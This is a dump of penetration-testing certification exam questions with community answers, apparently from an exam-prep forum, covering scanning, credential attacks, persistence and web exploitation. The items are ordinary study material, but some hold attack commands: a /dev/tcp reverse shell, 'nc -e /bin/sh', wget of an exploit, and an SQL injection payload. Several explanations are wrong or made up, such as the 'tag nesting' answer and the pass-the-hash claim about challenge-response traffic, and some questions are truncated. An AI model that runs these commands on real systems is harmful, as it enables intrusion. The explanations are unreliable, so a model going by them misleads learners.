A company recently moved its software development architecture from VMs to containers. The company has asked a penetration tester to determine if the new containers are configured correctly against a DDoS attack.Which of the following should a tester perform FIRST? A. Check the strength of the encryption settings. B. Determine if security tokens are easily available. C. Run a vulnerability check against the hypervisor. D. Scan the containers for open ports.
D. Scan the containers for open ports.
A penetration tester writes the following script: #!/bin/bash network = '10.100.100' ports = '22 23 80 443' for x in {1..254}; do (nc -zv $network.$x $ports); done Which of the following is the tester performing? A. Searching for service vulnerabilities B. Trying to recover a lost bind shell C. Building a reverse shell listening on specified ports D. Scanning a network for specific open ports
D. Scanning a network for specific open ports The script is using the command "nc -zv" which stands for "netcat -z -v" which is used to check if a specific port is open on a remote IP address. The script is looping through a range of IP addresses on the 10.100.100 network and attempting to connect to the specified ports (22, 23, 80, and 443) on each IP. This is a method of scanning a network to check which specific ports are open, also known as port scanning. The script is not performing any action related to service vulnerabilities or shell recovery/creation. "-z": Specifies that nc should not send any data to the target host, but instead just check if the port is open. This is also known as a "zero I/O mode" scan.
A penetration tester who is doing a company-requested assessment would like to send traffic to another system suing double tagging.Which of the following techniques would BEST accomplish this goal? A. RFID cloning B. RFID tagging C. Meta tagging D. Tag nesting
D. Tag nesting Tag nesting refers to the technique of embedding one or more metadata tags within another tag. This allows for multiple layers of information to be associated with a single data element. This technique is commonly used in penetration testing to evade detection and bypass security controls by hiding malicious payloads within legitimate tags. The other options (A, B and C) are not related to this context.
A penetration tester completed an assessment, removed all artifacts and accounts created during the test, and presented the findings to the client. Which of the following happens NEXT? A. The penetration tester conducts a retest. B. The penetration tester deletes all scripts from the client machines. C. The client applies patches to the systems. D. The client clears system logs generated during the test.
C. The client applies patches to the systems. After a penetration test is completed and the findings are presented to the client, the next step is for the client to address the vulnerabilities identified by the tester. This typically includes applying patches to the systems, configuring security controls, and implementing other remediation measures to close the identified security gaps. T he tester should not conduct retest, delete scripts or clear system logs as that is not their role. The client should keep the system logs for a period of time for compliance, forensic or regulatory requirements.
A penetration tester runs the following command:dig @ dns01.comptia.local axfr comptia.localIf successful, which of the following types of information would be provided? A. The DNSSEC certificate and CA B. The DHCP scopes and ranges used on the network C. The hostnames and IP addresses of internal systems D. The OS and version of the DNS server
C. The hostnames and IP addresses of internal systems search up what DIG command does and returns
Which of the following describes the reason why a penetration tester would run the command sdelete mimikatz. * on a Windows server that the tester compromised? A. To remove hash-cracking registry entries B. To remove the tester-created Mimikatz account C. To remove tools from the server D. To remove a reverse shell from the system
C. To remove tools from the server. The command `sdelete` is a command-line utility that can be used to securely delete files and cleanse free space on a disk in Windows. `Mimikatz` is a well-known tool used by attackers (and penetration testers) to extract plaintext passwords, hash, PIN code, and Kerberos tickets from memory. In the context of the given command `sdelete mimikatz.*`, the intention is to securely delete all files related to Mimikatz from the compromised server.
A penetration tester is exploring a client's website. The tester performs a curl command and obtains the following: <!doctype html> <html lang="en"> <head> <meata name="viewport" content="width=device-width" /> <meta http-equiv=content-type" content="text/html; charset=uthf-8" /> <title> WordPress › ReadMe</title> <link rel="stylesheet" href="wp-admin/css/install.css?ver-20100228" type="text/css" /> </head> Which of the following tools would be BEST for the penetration tester to use to explore this site further? A. Burp Suite B. DirBuster C. WPScan D. OWASP ZAP
C. WPScan WPScan is a specialized tool for performing vulnerability scanning and security assessments of WordPress-based websites. It can be used to identify vulnerabilities in WordPress core, plugins, and themes. WPScan can also be used to detect the version of the WordPress installation, which is important for identifying vulnerabilities that are specific to a particular version of WordPress. Burp Suite is a widely used tool for web application security testing, it includes an intercepting proxy, a web application scanner, and a web application vulnerability scanner. But in this case, the website is a WordPress-based website, WPScan would be the best choice. DirBuster is a tool that can be used to brute-force directory and file names on web servers. It can be useful in identifying hidden or unlinked files and directories on a website. OWASP ZAP (Zed Attack Proxy) is a web application security scanner. It can be used to identify vulnerabilities in web applications by performing automated scans, manual testing, and fuzzing.
A compliance-based penetration test is primarily concerned with: A. obtaining PII from the protected network. B. bypassing protection on edge devices. C. determining the efficacy of a specific set of security standards. Most Voted D. obtaining specific information from the protected network.
C. determining the efficacy of a specific set of security standards. A compliance-based penetration test is primarily concerned with determining whether a specific set of security standards are being met by the organization. The main goal is to assess the organization's compliance with these standards and identify any vulnerabilities or weaknesses that could potentially put sensitive data at risk. This could include testing for compliance with regulations such as HIPAA, PCI-DSS, SOX, etc. It does not focus on obtaining personal identifiable information (PII) or specific information from the protected network, or bypassing protection on edge devices.
Which of the following tools should a penetration tester use to crawl a website and build a wordlist using the data recovered to crack the password on the website? A. DirBuster B. CeWL C. w3af D. Patator
CeWL, the Custom Word List Generator, is a Ruby application that allows you to spider a website based on a URL and depth setting and then generate a wordlist from the files and web pages it finds. Running CeWL against a target organization's sites can help generate a custom word list, but you will typically want to add words manually based on your own OSINT gathering efforts.
The following PowerShell snippet was extracted from a log of an attacker machine: 1. $net="192.168.1." 2. $setipaddress ="192.168.2." 3. function Test-Password { 4. if (args[0] -eq 'Dummy12345') { 5. return 1 6. } 7. else { 8. $cat = 22, 25, 80, 443 9. return 0 10. } 11. } 12. $cracked = 0 13. crackedpd = [ 192, 168, 1, 2] 14. $i =0 15. Do { 16. $test = 'Dummy' + $i — 17. $cracked = Test Password Test 18. $i++ 19. $crackedp = ( 192, 168, 1, 1) + $cat 20. } 21. While ($cracked -eq 0) 22. Write
Changed to A. Line 8. PowerShell does not require brackets for defining an array. In fact, the code on line 8 is defining an array containing the values 22, 25, 80, and 443. ANSWER=A. WHY, See this search for array creation in powershell script. Now, we will see how to remove multiple items from PowerShell ArrayList by using the RemoveRange() method. $X=2,4,6,8,9,20,5 $y=[System.Collections.ArrayList]$X $y.RemoveRange(1,2) As you can see the arrat has no brackets and no periods. IT HAS SEMICOLLINS TO SEPERATE THE LISTED ITEMS OR VALUES.
Which of the following is a rules engine for managing public cloud accounts and resources? A. Cloud Custodian B. Cloud Brute C. Pacu D. Scout Suite
Cloud Custodian is an open source tool for managing and enforcing policies on cloud resources. It provides an integrated platform for managing cloud security, compliance, and cost optimization resources.
A customer adds a requirement to the scope of a penetration test that states activities can only occur during normal business hours. Which of the following BEST describes why this would be necessary? A. To meet PCI DSS testing requirements B. For testing of the customer's SLA with the ISP C. Because of concerns regarding bandwidth limitations D. To ensure someone is available if something goes wrong
D - Is the correct answer here. If something goes wrong like a critical application gets crashed from an aggressive vulnerability scan, someone will be there to restart the server.
During an assessment, a penetration tester gathered OSINT for one of the IT systems administrators from the target company and managed to obtain valuable information, including corporate email addresses. Which of the following techniques should the penetration tester perform NEXT? A. Badge cloning B. Watering-hole attack C. Impersonation D. Spear phishing
D - Spear Phishing. Since the tester gathered corporate email address, he can send phishing emails to see who will respond.
When planning a penetration-testing effort, clearly expressing the rules surrounding the optimal time of day for test execution is important because: A. security compliance regulations or laws may be violated. B. testing can make detecting actual APT more challenging. C. testing adds to the workload of defensive cyber- and threat-hunting teams. D. business and network operations may be impacted.
D - Testing can impact the business and network because the tools used for vulnerability scanning can increase the bandwidth on the network causing the network to be slow or crash the target system been tested which could cause denial of service.
A penetration tester has extracted password hashes from the lsass.exe memory process. Which of the following should the tester perform NEXT to pass the hash and provide persistence with the newly acquired credentials? A. Use Patator to pass the hash and Responder for persistence. B. Use Hashcat to pass the hash and Empire for persistence. C. Use a bind shell to pass the hash and WMI for persistence. D. Use Mimikatz to pass the hash and PsExec for persistence.
D is the answer Mimikatz is a credential hacking tool that can be used to extract logon passwords from the LSASS process and pass them to other systems. Once the tester has the hashes, they can then use PsExec, a command-line utility from Sysinternals, to pass the hash to the remote system and authenticate with the new credentials. This provides the tester with persistence on the system, allowing them to access it even after a reboot. "A penetration tester who has extracted password hashes from the lsass.exe memory process can use various tools to pass the hash and gain access to other systems using the same credentials. One tool commonly used for this purpose is Mimikatz, which can extract plaintext passwords from memory or provide a pass-the-hashcapability. After gaining access to a system, the tester can use various tools for persistence, such as PsExec or WMI." (CompTIA PenTest+ Study Guide, p. 186)
An executive needs to use Wi-Fi to connect to the company's server while traveling. Looking for available Wi-Fi connections, the executive notices an available access point to a hotel chain that is not available where the executive is staying. Which of the following attacks is the executive MOST likely experiencing? A. Data modification B. Amplification C. Captive portal D. Evil twin
D. Evil twin The other options don't describe the scenario provided. Data modification refers to altering data, Amplification is related to increasing the magnitude of an attack (common in DDoS attacks), and Captive portal refers to a login page to access a network, often used in legitimate public Wi-Fi systems.
A penetration tester wants to find hidden information in documents available on the web at a particular domain. Which of the following should the penetration tester use? A. Netcraft B. CentralOps C. Responder D. FOCA
D. FOCA FOCA (Fingerprinting Organizations with Collected Archives) is a tool that is used to find hidden information in documents available on the web. It can be used to extract metadata from documents such as PDF, Microsoft Office, OpenOffice, and others. The metadata can include information such as the author, creation date, and software used to create the document. FOCA can also extract information from the document's properties such as the title, keywords, and comments. This tool can also identify specific keywords and patterns in the document and can be useful in identifying sensitive information that may have been inadvertently left in the document. A. Netcraft is a tool that can be used to gather information about websites and domains, such as the IP address, hosting provider, and server software. B. CentralOps is a tool that can be used to gather information about IP addresses, such as geolocation and ownership. C. Responder is a tool that can be used to perform rogue
A penetration tester wrote the following comment in the final report: "Eighty-five percent of the systems tested were found to be prone to unauthorized access from the internet."Which of the following audiences was this message intended? A. Systems administrators B. C-suite executives C. Data privacy ombudsman D. Regulatory officials
I would say it is typically intended for B. C-suite executives. C-suite executives, such as the CEO (Chief Executive Officer) and CIO (Chief Information Officer), are responsible for making high-level strategic decisions for the organization. This kind of information is critical for them to understand the security posture of the organization's systems and the potential risks associated with unauthorized access. It is important for executives to be aware of vulnerabilities and security issues that could impact the organization's operations, reputation, and legal compliance. While systems administrators, data privacy ombudsmen, and regulatory officials may also have a vested interest in such findings, the message is often first communicated to top-level executives, who can then decide on the appropriate actions and resource allocation to address the identified security concerns.
A penetration tester was hired to perform a physical security assessment of an organization's office. After monitoring the environment for a few hours, the penetration tester notices that some employees go to lunch in a restaurant nearby and leave their belongings unattended on the table while getting food. Which of the following techniques would MOST likely be used to get legitimate access into the organization's building without raising too many alerts? A. Tailgating B. Dumpster diving C. Sho
IN this context only D makes sense. Believe it or not most orgs still use 125khz rfid bades, these are cloned in under a second. Tailgaiting is done on premise and doesnt fit with the context.
A penetration tester who is conducting a vulnerability assessment discovers that ICMP is disabled on a network segment. Which of the following could be used for a denial-of-service attack on the network segment? A. Smurf B. Ping flood C. Fraggle D. Ping of death
If ICMP (Internet Control Message Protocol) is disabled on a network segment, it would mean that ICMP-based attacks, like ping flood (option B) and ping of death (option D), would not be effective. ICMP is used in these attacks, and with it disabled, they wouldn't work on that segment. However, the question asks which of the following could be used for a denial-of-service attack on the network segment where ICMP is disabled. Since options B and D rely on ICMP, and option A (Smurf) also uses ICMP, they wouldn't be applicable here. This leaves: C. Fraggle A Fraggle attack is similar to a Smurf attack but uses UDP (User Datagram Protocol) rather than ICMP. Since the question does not mention anything about UDP being disabled, this would be the best choice from the given options for a denial-of-service attack on the network segment where ICMP is disabled.
In Python socket programming, SOCK_DGRAM type is: A. reliable. B. matrixed. C. connectionless. D. slower.
In Python socket programming, the SOCK_DGRAM type specifies a connectionless socket, which means that the communication between two endpoints does not establish a long-lived connection before exchanging data. Instead, each message is sent individually and may take a different route to reach its destination, which makes it suitable for protocols that do not require reliability, such as DNS or UDP-based applications. Provides datagrams, Connectionless due to the Datagram portion mentioned so that would mean its using UDP.
A company provided the following network scope for a penetration test: • 169.137.1.0/24 • 221.10.1.0/24 • 149.14.1.0/24 A penetration tester discovered a remote command injection on IP address 149.14.1.24 and exploited the system. Later, the tester learned that this particular IP address belongs to a third party. Which of the following stakeholders is responsible for this mistake? A. The company that requested the penetration test B. The penetration testing company C. The target host's
In a penetration testing scenario, the company requesting the test should provide accurate and clear scope, including the range of IP addresses that are to be tested. If an IP address is within the scope defined by the client and later turns out to be a third-party system, the responsibility for that mistake falls on the company that defined the scope. So, the correct answer is: A. The company that requested the penetration test
A penetration tester joins the assessment team in the middle of the assessment. The client has asked the team, both verbally and in the scoping document, not to test the production networks. However, the new tester is not aware of this request and proceeds to perform exploits in the production environment. Which of the following would have MOST effectively prevented this misunderstanding? A. Prohibiting exploitation in the production environment B. Requiring all testers to review the scoping do
In this scenario, the issue is a lack of communication and understanding of the constraints and boundaries set by the client. The most effective way to prevent this misunderstanding would have been to ensure that all members of the assessment team, including those joining mid-assessment, are fully aware of the requirements and restrictions defined in the scoping document. Option B, "Requiring all testers to review the scoping document carefully," directly addresses this issue by making sure that everyone involved in the assessment is aware of the client's requests and the scope of the assessment. Therefore, option B would have been the most effective way to prevent this misunderstanding.
A penetration tester has been hired to examine a website for flaws. During one of the time windows for testing, a network engineer notices a flood of GET requests to the web server, reducing the website's response time by 80%. The network engineer contacts the penetration tester to determine if these GET requests are part of the test. Which of the following BEST describes the purpose of checking with the penetration tester? A. Situational awareness B. Rescheduling C. DDoS defense D. Deconfli
In this scenario, the network engineer is reaching out to the penetration tester to understand if the flood of GET requests is part of the authorized testing. This is done to clarify the activities and ensure that both parties are on the same page about what is happening, and if any unintended conflicts or confusion might occur. The BEST description of the purpose of this check with the penetration tester would be: D. Deconfliction
A physical penetration tester needs to get inside an organization's office and collect sensitive information without acting suspiciously or being noticed by the security guards. The tester has observed that the company's ticket gate does not scan the badges, and employees leave their badges on the table while going to the restroom. Which of the following techniques can the tester use to gain physical access to the office? (Choose two.) A. Shoulder surfing B. Call spoofing C. Badge stealing D.
In this scenario, the physical penetration tester has observed certain behaviors and weaknesses that can be exploited to gain physical access to the office. Based on the information provided, the two techniques that would be most applicable are: C and D The other options listed (shoulder surfing, call spoofing, dumpster diving, and email phishing) could be used in various contexts for gathering information or gaining unauthorized access but are not directly applicable to the specific situation described here.
A penetration tester, who is doing an assessment, discovers an administrator has been exfiltrating proprietary company information. The administrator offers to pay the tester to keep quiet. Which of the following is the BEST action for the tester to take? A. Check the scoping document to determine if exfiltration is within scope. B. Stop the penetration test. C. Escalate the issue. D. Include the discovery and interaction in the daily report.
In this situation, the penetration tester has discovered an unethical and potentially illegal act. Accepting a bribe would be highly unethical and could also be illegal. The best course of action would be to follow proper channels and escalate the issue to the appropriate authorities within the organization or the client organization. So, the correct answer is: C. Escalate the issue. This ensures that the matter is dealt with according to the organization's policies and procedures, and it places the responsibility for handling the issue in the hands of those who are equipped to do so.
A new security firm is onboarding its first client. The client only allowed testing over the weekend and needed the results Monday morning. However, the assessment team was not able to access the environment as expected until Monday. Which of the following should the security company have acquired BEFORE the start of the assessment? A. A signed statement of work B. The correct user accounts and associated passwords C. The expected time frame of the assessment D. The proper emergency contacts f
Is not A, B or C because : A. A signed statement of work - "A new security firm is onboarding its first client" - it already has the approval B. The correct user accounts and associated passwords - "the assessment team was not able to access the environment as expected" - is not required to be Credential-based vulnerability assessment ! C. The expected time frame of the assessment - The client only allowed testing over the weekend and needed the results Monday morning - you have a timeframe
A penetration-testing team needs to test the security of electronic records in a company's office. Per the terms of engagement, the penetration test is to be conducted after hours and should not include circumventing the alarm or performing destructive entry. During outside reconnaissance, the team sees an open door from an adjoining building. Which of the following would be allowed under the terms of the engagement? A. Prying the lock open on the records room B. Climbing in an open window of t
It says after hours and C even says night guard. The others have the possibility of tripping an alarm.
A company recruited a penetration tester to configure intrusion detection over the wireless network. Which of the following tools would BEST resolve this issue? A. Aircrack-ng B. Wireshark C. Cowpatty D. Kismet
It's Kismet, as per CompTIA's study guide: "Kismet is included in Kali Linux and has many different functions. In addition to capturing packets, it can also act as a wireless intrusion detection system." By the way, if you care post a comment on the newer questions, I'll try to provide an answer.
A red team completed an engagement and provided the following example in the report to describe how the team gained access to a web server: x' OR role LIKE '%admin% Which of the following should be recommended to remediate this vulnerability? A. Multifactor authentication B. Encrypted communications C. Secure software development life cycle D. Parameterized queries
It's clearly an SQLi attack. The attackers presumably exfiltrated a database dump for administrator passwords, which they used for privilege escalation. Parameterized queries, in addition to input validation/sanitization, is one of the most recommended solutions to such injection attacks. MFA is essential as well, but that's just a general best practice. It doesn't fix this SPECIFIC vulnerability. Encryption is just another best security practice that doesn't remediate the underlying vulnerability in question. The secure SDLC is just a theoretical framework. It may advise fixes for software vulnerabilities like injection attacks, but it's not an actual solution in itself.
Which of the following commands will allow a penetration tester to permit a shell script to be executed by the file owner? A. chmod u+x script.sh B. chmod u+e script.sh C. chmod o+e script.sh D. chmod o+x script.sh
It's important to note that permissions on Linux are divided into three categories: owner, group, and others. The "u" in the argument refers to the owner of the file, "g" refers to the group and "o" refers to others. Also, the file permissions are divided into three types: read, write and execute. "r" refers to read permission, "w" refers to write permission and "x" refers to execute permission. So, this command allows the owner of the file "script.sh" to execute the file. u stands for user (or owner) g stands for group o stands for others a stands for all
Which of the following compliance requirements would be BEST suited in an environment that processes credit card data? A. PCI DSS B. ISO 27001 C. SOX D. GDPR
It's in the very name: Payment Card Industry Data Security Standards (PCI-DSS). It's mandatory for every organization processing credit-card data.
During an assessment, a penetration tester manages to exploit an LFI vulnerability and browse the web log for a target Apache server. Which of the following steps would the penetration tester most likely try NEXT to further exploit the web server? (Choose two.) A. Cross-site scripting B. Server-side request forgery C. SQL injection D. Log poisoning E. Cross-site request forgery F. Command injection
Local File Inclusion (LFI) vulnerabilities allow an attacker to include files on a server through the web browser. This potentially harmful code could lead to full server compromise if configured with improper permissions. In the context of exploiting an LFI vulnerability and browsing the web log for a target Apache server, the next logical steps to further exploit the web server would be: D. Log poisoning F. Command injection
A penetration tester has obtained root access to a Linux-based file server and would like to maintain persistence after reboot. Which of the following techniques would BEST support this objective? A. Create a one-shot system service to establish a reverse shell B. Obtain /etc/shadow and brute force the root password. C. Run the nc ג€"e /bin/sh <ג€¦> command D. Move laterally to create a user account on LDAP
Maintaining persistence on a system generally involves ensuring that access can be re-established after a reboot or other interruption. Among the options provided, the one that would BEST support the objective of maintaining persistence after reboot is: A. Create a one-shot system service to establish a reverse shell
A penetration tester has found indicators that a privileged user's password might be the same on 30 different Linux systems. Which of the following tools can help the tester identify the number of systems on which the password can be used? A. Hydra B. John the Ripper C. Cain and Abel D. Medusa
Medusa is a password cracking tool that can be used for network login password cracking. It can perform brute-force attacks, dictionary attacks, and other types of attacks against various protocols and services. It is designed to be fast and flexible, allowing it to work against multiple hosts at the same time. In this scenario, the penetration tester can use Medusa to attempt to log in to the 30 Linux systems using the suspected password. Medusa can be configured to run against multiple hosts simultaneously, so the tester can enter the IP addresses or hostnames of the 30 systems and let Medusa run the attack. If the password works on any of the systems, Medusa will report back which systems were successfully accessed.
A client evaluating a penetration testing company requests examples of its work. Which of the following represents the BEST course of action for the penetration testers? A. Redact identifying information and provide a previous customer's documentation. B. Allow the client to only view the information while in secure spaces. C. Determine which reports are no longer under a period of confidentiality. D. Provide raw output from penetration testing tools.
Ok I change to C for this reason: Showing confidential information, even after redacting sensitive information, can still be a breach of confidentiality agreements or ethical standards, unless you have obtained explicit permission from the owner of the information to do so. Redaction alone may not be enough to guarantee the confidentiality of the information. There may be other details within the documentation that could identify the previous customer or reveal sensitive information. Additionally, there may be legal or contractual obligations that prevent the disclosure of confidential information without explicit permission from the owner.
A penetration tester wants to scan a target network without being detected by the client's IDS.Which of the following scans is MOST likely to avoid detection? A. nmap -P0 -T0 -sS 192.168.1.10 B. nmap -sA -sV --host-timeout 60 192.168.1.10 C. nmap -f --badsum 192.168.1.10 D. nmap -A -n 192.168.1.10
Option A, "nmap -P0 -T0 -sS 192.168.1.10," may evade detection by some IDS systems, but it is less likely to be successful than option C. The "-P0" option disables host discovery using ICMP echo requests, which can prevent the target system from generating any logs related to the scan. However, some IDS systems may detect the SYN scan ("-sS") option used to perform the port scan. The "-T0" option sets a low timing template for the scan, but this alone may not be enough to avoid detection by some IDS systems. In addition, this option can also result in slower scans and longer wait times. Overall, while option A may provide some level of evasion from detection, option C, "nmap -f --badsum 192.168.1.10," is more likely to evade detection by using fragmentation and incorrect checksums to bypass some IDS systems.
A penetration tester attempted a DNS poisoning attack. After the attempt, no traffic was seen from the target machine. Which of the following MOST likely caused the attack to fail? A. The injection was too slow. B. The DNS information was incorrect. C. The DNS cache was not refreshed. D. The client did not receive a trusted response.
D. The client did not receive a trusted response. DNS poisoning, also known as DNS spoofing, is a type of attack in which an attacker alters the mapping of a domain name to an IP address, redirecting traffic from the intended domain to a malicious domain. If no traffic was seen from the target machine after the attempted DNS poisoning attack, it is most likely that the client did not receive a trusted response. This means that the client's DNS resolver did not trust the response from the attacker and did not update its cache with the malicious mapping provided by the attacker. This happens when the client's DNS resolver has implemented security measures such as DNSSEC (Domain Name System Security Extensions) which is a set of security extensions to DNS that provide authentication of DNS data and integrity of DNS data. In contrast, if the injection was too slow, the DNS information was incorrect, or the DNS cache was not refreshed, it would not prevent the client from receiving a
Which of the following is the MOST common vulnerability associated with IoT devices that are directly connected to the Internet? A. Unsupported operating systems B. Susceptibility to DDoS attacks C. Inability to network D. The existence of default passwords
D. The existence of default passwords The IoT provides a unique opportunity for manufacturers to build devices with the ability to communicate and perform specialized functions. However, because of the lack of rigorous testing, many devices have several insecure defaults that come preconfigured, such as the username and password. In many cases, the manufacturer has hard-coded these credentials and made them very difficult or impossible to remove. This can be dangerous, as once a malicious actor knows the type of device that is in use, they can then research the default username and password online. As a result, the team should research the default credentials for each IoT product you target during the PenTest.
A red team gained access to the internal network of a client during an engagement and used the Responder tool to capture important data. Which of the following was captured by the testing team? A. Multiple handshakes B. IP addresses C. Encrypted file transfers D. User hashes sent over SMB
D. User hashes sent over SMB The Responder tool is a LLMNR, NBT-NS and MDNS poisoner, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP authentication. It can capture user hashes sent over the SMB protocol, which can be used to perform pass-the-hash attacks. It can't capture multiple handshakes as it is not a wireless scanner, it can't capture IP addresses as it is not a network scanner, also it doesn't have the capability to capture encrypted files transfers.
A penetration tester is able to capture the NTLM challenge-response traffic between a client and a server.Which of the following can be done with the pcap to gain access to the server? A. Perform vertical privilege escalation. B. Replay the captured traffic to the server to recreate the session. C. Use John the Ripper to crack the password. D. Utilize a pass-the-hash attack.
D. Utilize a pass-the-hash attack. A pass-the-hash attack is a method of authenticating to a server or service by using the underlying NTLM or LANMAN hash of a user's password, instead of the actual password. The NTLM challenge-response traffic contains the hash of the password, which can be extracted and used in a pass-the-hash attack. Replaying the captured traffic to the server to recreate the session may not work as the session may have timed out or otherwise been terminated. Performing vertical privilege escalation would involve escalating privileges on the compromised system, which is not related to gaining access to the server. Using John the Ripper to crack the password would be ineffective as the traffic contains the hash of the password, not the password itself.
A penetration tester has been given an assignment to attack a series of targets in the 192.168.1.0/24 range, triggering as few alarms and countermeasures as possible.Which of the following Nmap scan syntaxes would BEST accomplish this objective? A. nmap -sT -vvv -O 192.168.1.2/24 -PO B. nmap -sV 192.168.1.2/24 -PO C. nmap -sA -v -O 192.168.1.2/24 D. nmap -sS -O 192.168.1.2/24 -T1
D. nmap -sS -O 192.168.1.2/24 -T1 The best Nmap scan syntax to accomplish this objective would be to use the -sS (TCP SYN scan) option, the -O (enable OS detection) option, and the -T1 (timing option) which is the slowest timing option. The -sS option uses the SYN packet to initiate a connection, which is less likely to be detected by intrusion detection systems (IDS) and firewalls as it does not complete the full TCP connection. The -O option enables OS detection, which can help identify the type of device that is being scanned and can be useful in identifying vulnerabilities specific to that OS. The -T1 option sets the timing option to the slowest setting, this will make the scan slower, but also less likely to trigger alarms and countermeasures
A penetration tester ran the following command on a staging server: python -m SimpleHTTPServer 9891Which of the following commands could be used to download a file named exploit to a target machine for execution? A. nc 10.10.51.50 9891 < exploit B. powershell -exec bypass -f \\10.10.51.50\9891 C. bash -i >& /dev/tcp/10.10.51.50/9891 0&1/exploit D. wget 10.10.51.50:9891/exploit
D. wget 10.10.51.50:9891/exploit The command "python -m SimpleHTTPServer 9891" starts a simple HTTP server on the machine it's executed on, on port 9891. This means that the file "exploit" would be served on the IP address of the machine on port 9891. To download the file "exploit" from the HTTP server that was started, the command "wget 10.10.51.50:9891/exploit" can be used. This command uses the wget utility to download files from the web via HTTP, HTTPS and FTP. In this case, it's connecting to the IP address 10.10.51.50 and port 9891, where the exploit file is hosted and download the file. Option A doesn't work because the command "nc" (netcat) is a tool that can be used to read and write data across a network, it's not used to download files. Option B and C are not valid commands that can be used to download files from a web server.
Deconfliction is necessary when the penetration test: A. determines that proprietary information is being stored in cleartext. B. occurs during the monthly vulnerability scanning. C. uncovers indicators of prior compromise over the course of the assessment. D. proceeds in parallel with a criminal digital forensic investigation.
Deconfliction is the process of coordinating activities to prevent conflicts or interference between different operations, investigations, or entities. In the context of a penetration test, deconfliction would be most relevant when: D. proceeds in parallel with a criminal digital forensic investigation. Explanation: Option D: When a penetration test is occurring at the same time as a criminal digital forensic investigation, there could be confusion or conflicts between the activities of the penetration testers and the investigators. Deconfliction ensures that the activities of one do not interfere with or compromise the other, and that both parties are aware of each other's activities.
The attacking machine is on the same LAN segment as the target host during an internal penetration test. Which of the following commands will BEST enable the attacker to conduct host discovery and write the discovery to files without returning results of the attack machine? A. nmap -sn -n -exclude 10.1.1.15 10.1.1.0/24 -oA target_txt B. nmap -iR 10 -n -oX out.xml | grep "Nmap" | cut -d "" -f5 > live-hosts.txt C. nmap -Pn -sV -O -iL target.txt -oA target_text_Service D. nmap -sS -Pn -n -iL targ
Definitely A. The nmap command using the option -sn for a ping scan. The option -n to disable reverse DNS resolution, the option -exclude to exclude the IP address of the attack machine (10.1.1.15), and the option -oA to output the results in all formats (Normal, Grepable, and XML) to the target_txt file.
During a penetration test, the domain names, IP ranges, hosts, and applications are defined in the: A. SOW. B. SLA. C. ROE. D. NDA
During a penetration test, the details like domain names, IP ranges, hosts, and applications are typically defined in the: C. ROE (Rules of Engagement) The Rules of Engagement document outlines the scope, boundaries, methods, and other specific details of the test. It ensures that both the client and the tester understand what is allowed and expected during the testing. Here's a brief overview of the other terms: A. SOW (Statement of Work): This document describes the overall objectives and deliverables for a project but might not include the specific technical details mentioned in the question. B. SLA (Service Level Agreement): This defines the level of service expected by a customer from a supplier, laying out the metrics by which that service is measured. D. NDA (Non-Disclosure Agreement): This is a legal contract that outlines the sharing of certain information between parties but restricts the further dissemination of that information.
Which of the following situations would require a penetration tester to notify the emergency contact for the engagement? A. The team exploits a critical server within the organization. B. The team exfiltrates PII or credit card data from the organization. C. The team loses access to the network remotely. D. The team discovers another actor on a system on the network.
During a penetration testing engagement, the penetration testers usually have rules of engagement and boundaries that they must follow. Notifying the emergency contact would be warranted if something unexpected and potentially harmful was encountered. In the given options, the situation that most likely would require immediate notification of the emergency contact is: D. The team discovers another actor on a system on the network. Discovering another unauthorized actor on the system could mean that there's an ongoing breach or other malicious activity. This situation would generally be considered an emergency, as it goes beyond the planned scope of the penetration test and represents an immediate risk to the organization. The other options might be part of the planned scope of the test or not represent immediate emergencies, depending on the particular circumstances of the engagemen
A penetration tester who is performing a physical assessment has achieved physical access to a call center for the assessed company. The tester is able to move freely around the room.Which of the following attack types is most likely to result in the tester obtaining personal or confidential information quickly? A. Dumpster diving B. Warwalking C. Vishing D. Smishing E. Shoulder surfing
E.
When developing a shell script intended for interpretation in Bash, the interpreter /bin/bash should be explicitly specified.Which of the following character combinations should be used on the first line of the script to accomplish this goal? A. <# B. <$ C. ## D. #$ E. #!
E. #! When developing a shell script intended for interpretation in Bash, the interpreter /bin/bash should be explicitly specified using the Shebang(#!) on the first line of the script. The combination of characters to accomplish this goal is "#!", known as Shebang. This is used to indicate to the operating system that the script is intended to be executed using the specified interpreter. The Shebang line should be the first line of the script and should be followed by the path to the desired interpreter. For example, "#!/bin/bash" for a Bash script. The other options <#, <$, ##, #$ are not used to specify interpreter in shell script.
A penetration tester who is performing an engagement notices a specific host is vulnerable to EternalBlue. Which of the following would BEST protect against this vulnerability? A. Network segmentation B. Key rotation C. Encrypted passwords D. Patch management
EternalBlue exploits a server message block (SMB) vulnerability resulting in remote code execution, allowing the attacker to gain access to the target system. It is important to patch vulnerable systems and practice good cyber security hygiene to protect against this type of attack.
Which of the following web-application security risks are part of the OWASP Top 10 v2017? (Choose two.) A. Buffer overflows B. Cross-site scripting C. Race-condition attacks D. Zero-day attacks E. Injection flaws F. Ransomware attacks
Even if you don't memorize the entire list, it's crucial to remember that OWASP centers around web applications. B and E are the only applicable vulnerabilities as such.
A penetration tester is trying to restrict searches on Google to a specific domain. Which of the following commands should the penetration tester consider? A. inurl: B. link: C. site: D. intitle:
Fairly straightforward. The site: operator (as I used routinely even as a layman) filters search results to the specified sitename (domain). inurl: restricts search results to URLs that contain a specified keyword. intitle: is deprecated anyway, and it only applied to blog titles using the now-retired Google Blog subservice. link: is used to find pages linking to the specified domain. This is also now deprecated.
A penetration tester wants to test a list of common passwords against the SSH daemon on a network device. Which of the following tools would be BEST to use for this purpose? A. Hashcat B. Mimikatz C. Patator D. John the Ripper
For the specific task of testing a list of common passwords against the SSH daemon on a network device, you would want to use a tool designed to perform brute-force attacks on network services like SSH. Among the options provided, the best tool for this task is: C. Patator Patator is a versatile brute-force tool that supports various network protocols, including SSH. It can be used to attempt to authenticate using a list of usernames and passwords, making it suitable for the task described. A. Hashcat is a tool used for password cracking and recovery. It is designed to find weak passwords through brute-force attack. However, it is not the best tool for testing a list of common passwords against an SSH daemon on a network device, as it is not designed for this purpose. B. Mimikatz is a post-exploitation tool that can be used to gather credentials from various sources. It is not the best tool for testing a list of common passwords against an SSH daemon on a network device, as it i
go to question #267 on page 27 of examtopics, this is a simulation question
